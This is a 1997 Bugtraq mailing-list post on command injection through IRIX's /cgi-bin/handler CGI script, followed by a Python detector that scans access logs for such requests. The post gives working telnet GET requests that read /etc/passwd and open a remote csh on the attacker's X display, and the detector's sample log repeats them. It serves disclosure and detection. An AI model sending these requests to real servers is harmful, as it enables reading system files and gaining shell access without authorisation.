[5006] in bugtraq


Re: CPSR 7: IRIX WWW Server

daemon@ATHENA.MIT.EDU (Thomas Walter)
Thu Jul 24 12:20:08 1997

Date: 	Thu, 24 Jul 1997 17:51:56 +0200
Reply-To: balu@STUDST.FH-MUENSTER.DE
From: Thomas Walter <balu@STUDST.FH-MUENSTER.DE>
To: BUGTRAQ@NETSPACE.ORG

Hiho...

[Corinne Posse Relaeses wrote]
> Quite a while ago, Razvan Dragomirescu (drazvan@kappa.ro) released a
> report on the default cgi-handler scripts that ship with IRIX systems
> with web servers, and some other web server programs. Just like with
> the phf bug, with the cgi-handler bug a malicious user could start
> an xterm from the server machine on their own system.
>
> Example:
>
> telnet www.highly.respectable.bank.com 80
> Trying 300.300.300.1...
> Connected to www.highly.respectable.bank.com
> Escape character is '^]'.
> GET /cgi-bin/handler/blah;xwsh  -display   yourhost.com|?data=Download
>
> Please note the format of the "GET" query. The above assumes xwsh is
> in the PATH somewhere, and the "space" between "xwsh" and "-display"
> should be a TAB.

I had some problems while trying that...
First it seemed that xwsh was not in the path, so I tried to call
xwsh with an explicit path (note that all whitespace after GET
/cgi-bin/handler/ must be tabs...):

enemy% telnet victim 80
Trying 1.2.3.4...
Connected to victim.
Escape character is '^]'.
GET /cgi-bin/handler/ ;/usr/sbin/xwsh  -display  enemy:0|?data=Download
UX:sh (sh): ERROR: Connection closed by foreign host.
enemy%

That opened the xwsh window... but there was only one error message in
the first line:

/usr/sbin/xwsh: Permission denied: can't start command

Hm - what could that be? Doesn't matter - let's see what I can do with
other commands... (remember the tabs...)

enemy% telnet victim 80
Trying 1.2.3.4...
Connected to victim.
Escape character is '^]'.
GET /cgi-bin/handler/   ;cat    /etc/passwd|?data=Download
UX:sh (sh): ERROR: root:x:0:0:Super-User:/:/bin/csh
sysadm:x:0:0:System V Administration:/usr/admin:/bin/sh
[... I wont give you that ;) ...]
nobody:x:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
[... and again some more ...]
Connection closed by foreign host.

Hm - a shadowed passwd... was my first thought... Let's see if I can get
the shadow... [as above] - didn't work. So it seems that the WWW server
was not running as root (what a pity ;). If it does not run as root, it
usually runs as nobody. And what can we see above? nobody has the shell
/dev/null - that's why my xwsh was not able to start a command. Next try
was to give xwsh the command that it should start... (and again: tabs! -
and of course everything on one line...)

enemy% telnet victim 80
Trying 1.2.3.4...
Connected to victim.
Escape character is '^]'.
GET /cgi-bin/handler/;/usr/sbin/xwsh  -display  enemy:0  -e
/bin/csh|?data=Download
UX:sh (sh): ERROR: Connection closed by foreign host.
enemy%

And voila! - What else do you want? Any other programs to start? Just
try...

Brgds
     Balu
--
                                                            /'^'\
Please note: English is not my mother tongue               ( o o )
-------------------------------------------------------oOOO--(_)--OOOo
E-Mail: balu@studst.fh-muenster.de
Snail Mail: Thomas Walter
            Wemhoefer Stiege 10a, 48565 Burgsteinfurt   .oooO
or          Broxtermannstr.12, 49082 Osnabrueck, GERMANY(   )   Oooo.
---------------------------------------------------------\ (----(   )-
                                                          \_)    ) /
                                                                (_/
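As an added example (not part of the original post, and not code from IRIX or the handler script), here is a small detector for the request pattern shown in the post as it would appear in a web server access log: a path under /cgi-bin/handler/ whose tail carries ';', '|' or TAB before the '?data=Download' query, with the URL-encoded %09 form of TAB handled as well. The log lines, client addresses and timestamps are constructed for illustration; the three request shapes are the ones typed in the telnet sessions above.

```python
"""Flag /cgi-bin/handler command injection in Common Log Format lines.

Added example, not part of the original Bugtraq post. The sample log
below is constructed; hosts, addresses and timestamps are hypothetical.
"""
import re
from urllib.parse import unquote

# Constructed sample access log (CLF). Lines 1-2 mirror the injected
# requests from the post (the second one with TAB URL-encoded as %09);
# lines 3-4 are benign requests that must not be flagged.
SAMPLE_LOG = """\
1.2.3.5 - - [24/Jul/1997:17:51:56 +0200] "GET /cgi-bin/handler/\t;/usr/sbin/xwsh\t-display\tenemy:0|?data=Download HTTP/1.0" 200 512
1.2.3.5 - - [24/Jul/1997:17:52:10 +0200] "GET /cgi-bin/handler/%09;cat%09/etc/passwd|?data=Download HTTP/1.0" 200 1024
1.2.3.6 - - [24/Jul/1997:17:53:00 +0200] "GET /cgi-bin/handler/index.html?data=Download HTTP/1.0" 200 2048
1.2.3.7 - - [24/Jul/1997:17:54:00 +0200] "GET /index.html HTTP/1.0" 200 4096
"""

# Lazy '.*?' for the target so that TABs inside the path are captured.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?) HTTP/[\d.]+" (?P<status>\d{3})'
)
HANDLER_PREFIX = "/cgi-bin/handler/"
# ';' and '|' chain shell commands; TAB is what the post uses as the
# argument separator inside the handler path.
SHELL_META = re.compile(r"[;|\t]")


def handler_injection(target):
    """Return the injected shell fragment (tabs rendered as spaces) when the
    request target abuses /cgi-bin/handler, otherwise None."""
    path, _, _query = target.partition("?")
    decoded = unquote(path)  # %09 -> TAB, %3B -> ';', %7C -> '|'
    if not decoded.startswith(HANDLER_PREFIX):
        return None
    tail = decoded[len(HANDLER_PREFIX):]
    if not SHELL_META.search(tail):
        return None
    # Show the fragment the way sh would see it after the script runs it.
    return " ".join(tail.split())


def scan_log(log_text):
    """Return a list of (client, fragment) for every suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        frag = handler_injection(m.group("target"))
        if frag is not None:
            hits.append((m.group("client"), frag))
    return hits


if __name__ == "__main__":
    for client, frag in scan_log(SAMPLE_LOG):
        print("%s: handler injection -> %s" % (client, frag))
```

Decoding the path before matching matters: a client can send %09 (or %3B, %7C) instead of a literal TAB, ';' or '|', and a detector that only looks at the raw log line misses it. The query string is split off first so that a harmless '?data=Download' on a plain file request is not treated as a hit.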
